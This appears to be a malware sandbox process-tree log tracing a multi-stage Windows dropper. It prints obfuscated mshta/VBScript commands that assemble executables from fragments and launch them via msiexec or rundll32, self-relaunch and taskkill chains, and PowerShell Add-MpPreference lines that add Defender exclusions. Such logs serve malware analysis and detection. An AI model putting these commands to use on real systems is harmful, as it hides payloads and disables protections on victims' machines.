C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
-
C:\Users\Admin\Pictures\Adobe Films\WTkq_9ecc7BH3DTIjhrTRzAW.exe"C:\Users\Admin\Pictures\Adobe Films\WTkq_9ecc7BH3DTIjhrTRzAW.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01d42d6cf82db.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exeSat01d42d6cf82db.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exeC:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01d42d6cf82db.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01c0e0d4fbb2ea73.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c0e0d4fbb2ea73.exeSat01c0e0d4fbb2ea73.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01519886887.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exeSat01519886887.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01c5002407.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0119f3e03c741b02f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat0119f3e03c741b02f.exeSat0119f3e03c741b02f.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01688f54435b6.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01688f54435b6.exeSat01688f54435b6.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat018ad0a25a7faa.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01f932a994dbc6.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exeSat01f932a994dbc6.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01f932a994dbc6.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01e3b3e0fa80800c.exe5⤵
-
C:\Windows\SysWOW64\cmstp.exe"C:\Windows\SysWOW64\cmstp.exe"2⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\okMapBnuwoKkFkv6DNJnxaAd.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\D6C9.exeC:\Users\Admin\AppData\Local\Temp\D6C9.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\D6C9.exeC:\Users\Admin\AppData\Local\Temp\D6C9.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\9D1.exeC:\Users\Admin\AppData\Local\Temp\9D1.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\1386.exeC:\Users\Admin\AppData\Local\Temp\1386.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 2803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\52B3.exeC:\Users\Admin\AppData\Local\Temp\52B3.exe2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\569C.exeC:\Users\Admin\AppData\Local\Temp\569C.exe2⤵
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f37888c9-9b29-4739-ae22-503de57e652d\test.bat"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\569C.exe" -Force3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5624 -s 22924⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8793946f8,0x7ff879394708,0x7ff8793947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:35⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3852 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5620 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5332 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5436 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2264,714398010805367168,16671015018694859750,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.04⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8793946f8,0x7ff879394708,0x7ff8793947185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,8579713172923436235,9320072428026626032,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:35⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\569C.exe" -Force3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 22884⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\5C69.exeC:\Users\Admin\AppData\Local\Temp\5C69.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6272 -s 2363⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\65A2.exeC:\Users\Admin\AppData\Local\Temp\65A2.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7148 -s 2403⤵
- Suspicious use of SetThreadContext
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\6B9E.exeC:\Users\Admin\AppData\Local\Temp\6B9E.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\6B9E.exeC:\Users\Admin\AppData\Local\Temp\6B9E.exe3⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe b7e53dc7f6f9f6d3f8fef6eff7339ba4 4u7jN66aPkqkVsvoBawzOQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01e3b3e0fa80800c.exeSat01e3b3e0fa80800c.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exeSat018ad0a25a7faa.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-9IL7H.tmp\Sat018ad0a25a7faa.tmp"C:\Users\Admin\AppData\Local\Temp\is-9IL7H.tmp\Sat018ad0a25a7faa.tmp" /SL5="$30132,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01c5002407.exeSat01c5002407.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\6925404.exe"C:\ProgramData\6925404.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\4877252.exe"C:\ProgramData\4877252.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\7604105.exe"C:\ProgramData\7604105.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\8633857.exe"C:\ProgramData\8633857.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\ProgramData\8633857.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If """" == """" for %d in ( ""C:\ProgramData\8633857.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\ProgramData\8633857.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "" =="" for %d in ("C:\ProgramData\8633857.exe") do taskkill /im "%~nXd" -F4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "8633857.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\zrvA.exezRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpT: clOSE ( CReATeObJEct ( "wSCRipT.sHeLL"). RUn ("C:\Windows\system32\cmd.exe /Q /r TYpe ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If ""/PqtlfVLLUzTsVT2Ot9MwAu "" == """" for %d in ( ""C:\Users\Admin\AppData\Local\Temp\zrvA.exe"") do taskkill /im ""%~nXd"" -F " ,0 , TrUe))6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /r TYpe "C:\Users\Admin\AppData\Local\Temp\zrvA.exe" >zrvA.exe &&STArt zRva.EXE /PqtlfVLLUzTsVT2Ot9MwAu &If "/PqtlfVLLUzTsVT2Ot9MwAu " =="" for %d in ("C:\Users\Admin\AppData\Local\Temp\zrvA.exe") do taskkill /im "%~nXd" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscriPt: closE ( cREATEObject("WsCript.Shell" ). RuN ( "C:\Windows\system32\cmd.exe /c EChO | set /P = ""MZ"" > BXCX3.r © /B /y BXCX3.R+ j5IuH.B+ 1QL5Dt.T + CPR97qq.W8m + JuDE.JgD _gHPacAe.0 &stArt msiexec.exe /Y .\_GHPacae.0 " , 0 , tRue ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EChO | set /P = "MZ" > BXCX3.r © /B /y BXCX3.R+ j5IuH.B+1QL5Dt.T + CPR97qq.W8m+ JuDE.JgD _gHPacAe.0&stArt msiexec.exe /Y .\_GHPacae.07⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>BXCX3.r"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y .\_GHPacae.08⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "" =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat01519886887.exe") do taskkill -f /Im "%~NxM"2⤵
-
C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE..\BBIOhV.Exe -PTptXOWlEYbyb3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF ""-PTptXOWlEYbyb "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "-PTptXOWlEYbyb " =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE") do taskkill -f /Im "%~NxM"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRiPt: CLoSe (creAtEOBJECt ( "WsCRIPt.sHeLl"). rUn ("cMD /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w & ECho | set /p = ""MZ"" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n + ZiENV9W.9 + TJDT~50N.T+ Q3ePSE6P.B + u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq & Del /q *& StarT control ..\XEULVZFm.BWq " , 0 , TRUE ) )4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w &ECho | set /p = "MZ" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n +ZiENV9W.9+ TJDT~50N.T+Q3ePSE6P.B+ u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq &Del /q *& StarT control ..\XEULVZFm.BWq5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>IRPJ4p_.E"6⤵
-
C:\Windows\SysWOW64\control.execontrol ..\XEULVZFm.BWq6⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq7⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq8⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\XEULVZFm.BWq9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "Sat01519886887.exe"3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe"C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe" /SILENT1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-QKESC.tmp\Sat018ad0a25a7faa.tmp"C:\Users\Admin\AppData\Local\Temp\is-QKESC.tmp\Sat018ad0a25a7faa.tmp" /SL5="$2020E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8F07DB83\Sat018ad0a25a7faa.exe" /SILENT2⤵
-
